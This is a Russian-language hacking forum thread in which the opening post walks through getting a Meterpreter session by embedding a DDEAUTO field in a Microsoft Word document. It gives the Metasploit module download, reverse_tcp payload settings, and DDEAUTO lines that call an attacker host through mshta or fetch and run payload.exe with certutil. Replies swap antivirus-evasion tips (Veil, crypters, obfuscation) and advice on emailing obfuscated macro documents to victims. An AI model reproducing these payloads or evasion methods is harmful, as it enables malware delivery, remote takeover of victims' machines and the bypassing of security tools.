Meterpreter сессия через Microsoft Word

adm2

Well-known member
05.07.2017
51
103
#1
Добрый день.
В двух словах покажу как получить сессию meterpreter используя встроенную функцию Microsoft Office DDE
Почерпнуть немного информации о том что это можно тут:
Для просмотра контента необходимо: Войти или зарегистрироваться


Информация предоставлена для ознакомления, используйте на свой страх и риск.

Нам понадобится Kali linux и какая-нибудь винда (любая от XP до windows 10) с установленным на нём пакетом microsoft office.

Приступим:
Качаем пакет и копируем его в каталог metasploit
Код:
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
cp dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/
Запускаем metasploit и на всякий обновляем модули
msf > reload_all
msf > use exploit/windows/dde_delivery
Подгружаем полезную нагрузку
msf exploit(dde_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(dde_delivery) > set lhost 192.168.6.30 (тут ваш IP)
msf exploit(dde_delivery) > exploit

Вывод будет следующим:
2017-11-09_14-46-30.png
И нам нужны последние строки, которые мы и вставляем в ворд
У меня это
Код:
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe "http://192.168.6.30:8080/dOwU9wGE10np3"
Вот
Для просмотра контента необходимо: Войти или зарегистрироваться
куда и как нужно ето воткнуть

Дальнейшие действия понятны: доставляем этот файл на атакуемый компьютер и запускаем
При открытии будут выскакивать различного рода предупреждения, но ничего связанного с безопасностью там не сказано, но некоторые антивирусы уже будут ругаться на файл.
2017-11-09_15-31-31.png

2017-11-09_15-31-54.png

2017-11-09_15-32-14.png

После открытия файла прилетит заветная сессия meterpreter
2017-11-09_14-59-20.png

Многие антивирусы уже реагируют на файл. Проверка на nodistribute.com
Для просмотра контента необходимо: Войти или зарегистрироваться


rkvTgVliH2mEFy4JLhANd1.png

Спасибо за внимание)
P.S. Первый раз пишу статью на форум, посему наверное немного сумбурная подача)

[doublepost=1510562006,1510226184][/doublepost]Альтернативный код для загрузки файлов, можно использовать не только meterpreter, но и любой продукт для пост-эксплуатации. Empire например

Код:
DDEAUTO c:\\Windows\\system32\\cmd.exe "/k certutil -urlcache -split -f http://192.168.0.50/payload.exe && payload"
 

Вложения

Последнее редактирование:

adm2

Well-known member
05.07.2017
51
103
#4
Аваст и есет от жизни отстали..) Нихрена не видят :) Касперыч глазастый
Любопытно что шестой есет потом всё таки нашёл подозрительную активность в файле, а вот пятый до сих пор слепой котёнок

Если использовать нагрузку, созданную через Veil (про собственные крипторы вообще молчу) и подгрузить её таким образом:
> DDEAUTO c:\\Windows\\system32\\cmd.exe "/k certutil -urlcache -split -f
Для просмотра контента необходимо: Войти или зарегистрироваться
&& payload"
То здесь даже шестой нод ничего не видит.
 
Симпатии: Понравилось Kalina
07.09.2017
264
300
#5
Любопытно что шестой есет потом всё таки нашёл подозрительную активность в файле, а вот пятый до сих пор слепой котёнок

Если использовать нагрузку, созданную через Veil (про собственные крипторы вообще молчу) и подгрузить её таким образом:
> DDEAUTO c:\\Windows\\system32\\cmd.exe "/k certutil -urlcache -split -f
Для просмотра контента необходимо: Войти или зарегистрироваться
&& payload"
То здесь даже шестой нод ничего не видит.
А что на счет "собственные крипторы" может поделишься ?)
 

adm2

Well-known member
05.07.2017
51
103
#6
А что на счет "собственные крипторы" может поделишься ?)
У меня их пока нет, на этой тропе я всего полгода, после того как чуть не поразил WannaCry (спасло то что ПК не смотрели напрямую в инет)
Посему пришлось окунуться в область информационной безопасности поглубже дабы знать где, как, через что, откуда и каким образом может проникнуть какой-нибудь зловред)
 
10.11.2016
121
427
#11
Есть методы хорошей обфускации DDE-шек, тут на форуме была про них статья! с помощью функции QUOTE, гугл всем в помощь
Статью можно почитать по ссылке. Кстати, в версиях MSWord не позднее 2007, можно также использовать frames и framesets, которые используются для загрузки произвольного html кода с любой веб-страницы в поле frame документа.
 
07.09.2017
264
300
#12
Статью можно почитать по ссылке. Кстати, в версиях MSWord не позднее 2007, можно также использовать frames и framesets, которые используются для загрузки произвольного html кода с любой веб-страницы в поле frame документа.
Вчера через юникорн создал файл, чекается 10тью антивирусами. Из топовых только касперский. Позор есет и авасту) Может я как-то натупил, но вряд ли. Смотрите:
Для просмотра контента необходимо: Войти или зарегистрироваться
 

Hackaton192

Active member
30.01.2017
31
28
#13
Вчера через юникорн создал файл, чекается 10тью антивирусами. Из топовых только касперский. Позор есет и авасту) Может я как-то натупил, но вряд ли. Смотрите:
Для просмотра контента необходимо: Войти или зарегистрироваться
Думаю все кто в теме давно уже юзают данный инструмент, всем пожалуйста:
https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads

На мой взгляд тема с DDE, уступает тем же макросам, так как ПЕРВОЕ уж очень много раз приходится нажать на OK. А ВТОРОЕ с точки соц.инженерии жертва не видит документа и ее сложно заинтересовать(только лишь названием документа получается и то,что в теле письма,если мы рассылаем через e-mail), поэтому я юзаю хорошо обфусцированные макросы(пусть они на известные почтовые сервисы доходят хуже, но на корпоративные почтовики залетают как-надо)
 

shooter

Премиум
25.10.2016
177
131
#14
За статью спасибо! но было бы интереснее узнать что нибудь про CVE-2017-11882
 

adm2

Well-known member
05.07.2017
51
103
#16
Здорово, надо было на конкурс !
Какой конкурс =) самое обычное описание стандартного, в скором времени, описания эксплоита)
Вот когда найдёт просвещение, тогда да)
[doublepost=1512535453,1512534183][/doublepost]
За статью спасибо! но было бы интереснее узнать что нибудь про CVE-2017-11882
С момента комментария вышло две статьи на данную CVE
CVE-2017-11882 или Взлом с помощью безобидного документа
CVE-2017-11882 MS Word Metasploit